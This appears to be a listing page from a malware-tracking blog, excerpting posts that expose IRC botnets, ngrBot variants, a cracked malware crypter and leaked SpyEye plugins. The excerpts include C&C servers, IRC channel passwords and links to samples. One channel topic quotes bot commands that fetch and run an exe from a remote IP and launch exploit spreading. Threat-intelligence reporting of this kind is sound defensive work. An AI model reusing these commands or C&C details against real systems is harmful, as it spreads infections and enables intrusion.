proxysafe.mrkva.su(irc botnet hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)

Uncategorized

This is another reptile mod wich spreads better then ngrBot wich is more famous because being for sell around proxysafe.mrkva.su 212.7.214.43 C&C Server: 212.7.214.43:2345 Server Password: Username: x Nickname: n[DEU|XP]7480782 Channel: #!proxy! (Password: ) Channeltopic: exe file for analysis: Download Download1 Download2 hosting infos: http://whois.domaintools.com/212.7.214.43

ColdSeal 5.4.1 Ultimate Release–FWB++ CRACKED

Uncategorized

About the “coder” About ColdSeal Cryptor ColdSeal Cryptor this guy claim to be computer engineer …lol The tool is used mainly to protect malwares like RAT’s,Bots,Trojans alot of hf hecker’s are buying this and this “coder” is making alot of money from this dirty busines Price: Pay to Account U2903909 (ToXiiC) via LR Amount $70.00Read more...

Downloader.Generic, Downloader, Trojan.Win32.Scar.rfw, BackDoor-DKA(hosted in United States Vpls Inc. D/b/a Krypt Technologies)

Uncategorized

Interessing malware here some infos i got from the exe: a.ip-163.com DNS_TYPE_A 174.139.61.74 what it does: Write to foreign memory areas: This executable tampers with the execution of another process. Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary. Start/Install windows service: This executable starts a windows service. ServicesRead more...

SpyEye Plugins

Uncategorized

Here some plugins used from the celebre malware SpyEye found by formatme and allready public into russian forums Reversing guys will have good time with this package Guess what ? Theyre backdoored like everything leaked to public so be carefull Download

www.merkurvideo.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

Uncategorized

Domains used to control bots: www.facebookvideocentral.com 46.45.164.166 www.merkurvideo.com 46.45.164.166 www.pr0.net 74.206.242.164 C&C Server: 46.45.164.166:81 Server Password: Username: SP3-431 Nickname: [00_DEU_XP_6037696] Channel: #i (Password: ) Channeltopic: :.asc -S -s |.http http://46.45.164.165/iii.exe |.asc exp_all 15 5 0 -c -e |.asc exp_all 15 5 0 -b -r -e |.asc exp_all 15 5 0 -c |.asc exp_all 10 5Read more...

xL.x1x2.in(ngrBot hosted in France Paris Gandi)

Uncategorized

Resolved : [xL.x1x2.in] To [95.142.167.131]port 4949 for irc Resolved : [xL.x1x2.in] To [95.142.166.253]port 4949 for irc Resolved : [xL.x1x2.in] To [92.243.15.137]port 4949 for irc Resolved : [xL.x1x2.in] To [103.1.184.45]port 4949 for irc Remote Host Port Number 176.9.42.247 8332 Bitcoin Malware 199.15.234.7 80 199.7.176.144 80 199.7.177.228 80 74.120.10.153 80 74.120.8.161 80 95.142.167.131 4949 irc port (beforeRead more...

118.69.220.81(irc botnet hosted in Viet Nam Ip Range For Xdsl Iptv Fixed Phone Service At Hcmc)

Uncategorized

Remote Host Port Number 118.69.220.81 6667 PASS weed Clients: I have 110 clients and 0 servers Local users: Current Local Users: 110 Max: 115 Global users: Current Global Users: 110 Max: 115 MODE [00|USA|XP|SP2]-8799 +x JOIN ##vam## vampir123 USERHOST [00|USA|XP|SP2]-8799 PONG :Vampir.hack-mx.ru.net NICK [00|USA|XP|SP2]-8799 USER pmlai 0 0 :[00|USA|XP|SP2]-8799 hosting infos: http://whois.domaintools.com/118.69.220.81